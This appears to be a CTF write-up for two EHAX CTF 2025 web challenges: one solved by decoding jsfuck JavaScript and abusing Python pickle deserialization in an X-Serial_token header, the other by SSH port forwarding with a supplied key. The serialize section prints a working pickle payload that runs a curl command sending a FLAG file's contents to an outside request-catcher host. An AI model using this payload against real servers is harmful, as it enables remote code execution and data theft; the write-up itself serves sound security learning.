# EHAX CTF 2025

Pwn Rev Crypto checkout my teammate writeup :[ ](https://mikimiku.gitbook.io/more-more-pwn/contests/ctf-tours/ehax-ctf-2025) | Challenge | Catergory | | ---------------------------------------------------------------------------------------------------------- | --------- | | [serialize](https://aurichia.gitbook.io/aurichia-docs/ctfs-tours/2025/ehax-ctf-2025#serialize) | Web | | [Quandale Dingle](https://aurichia.gitbook.io/aurichia-docs/ctfs-tours/2025/ehax-ctf-2025#quandale-dingle) | Web | *** {% stepper %} {% step %} ### serialize > author: benzo

starting the challenge we are greeted by a login page after a simple enumeration

we can see that the website uses an obfuscation technique called jsfuck so knowing that we can just use an online decoder like \`\`

after changing the variable names

now we can understand the code better as we can see we got the username and password of dreky

logging in we were redirected to a picture this is weird so i relogged in and intercepted my request and found a hidden endpoint

and we found the part 1 of the flag but then after another enumeration in the new page

i found this endpoint saved in the css file

and we managed to get to part 2

seeing the request we can see a weird token in the X-Serial\_token and after we decode this we can understand that that is a system command so it seems like the web uses pickle serialization and deserialization you can read it here \`\` so we can easily create our own payload for the server to run using this {% code overflow="wrap" %} ```python import pickle import base64 import os class Exploit: def __reduce__(self): return (os.system, ("curl https://huanggay.requestcatcher.com?a=$(cat FLAG)",)) payload = pickle.dumps(Exploit()) encoded_payload = base64.b64encode(payload).decode() print(encoded_payload) ``` {% endcode %} we can just inject the X-Serial\_token in the header like `X-Serial_token: payload` then we can redo the request in my payload im making the server curl to my own server so that i could see the result

i made the server do an ls and wrap it up in base64 so i could see the whole result

using cyber chef we can just decode it and as we can see there is a file called FLAG we can just cat it

and we solved the challenge! E4HX{oh\_h3l1\_n44www\_y0u\_8r0k3\_5th\_w4l1} {% endstep %} {% step %} ### Quandale Dingle > What's up guys! It's Quandale Dingle here! (rheheheh) I have been arrested for multiple crimes. Including: Searching for videos which I shouldnt on `MACHINE IP` /stream > > author: anonimbus, benzo

starting the challenge we were given a pem file

and it was a private key thats good to know cause we can just connect to the server and gain rce

after accessing the server it seems like we dont really have privilege to the server and cant even run simple bash commands and we cant even get anything but what if we can access the web server?

first i tried port forwarding the port 80 but it seems that the server didnt even use that port so i tried the other web server port 8080

we can actually access the web server and gain a mp4 file {% file src="" %} and we got the very epic video above and got the flag from the video EH4X{55H\_Tunn3linG} {% endstep %} {% endstepper %}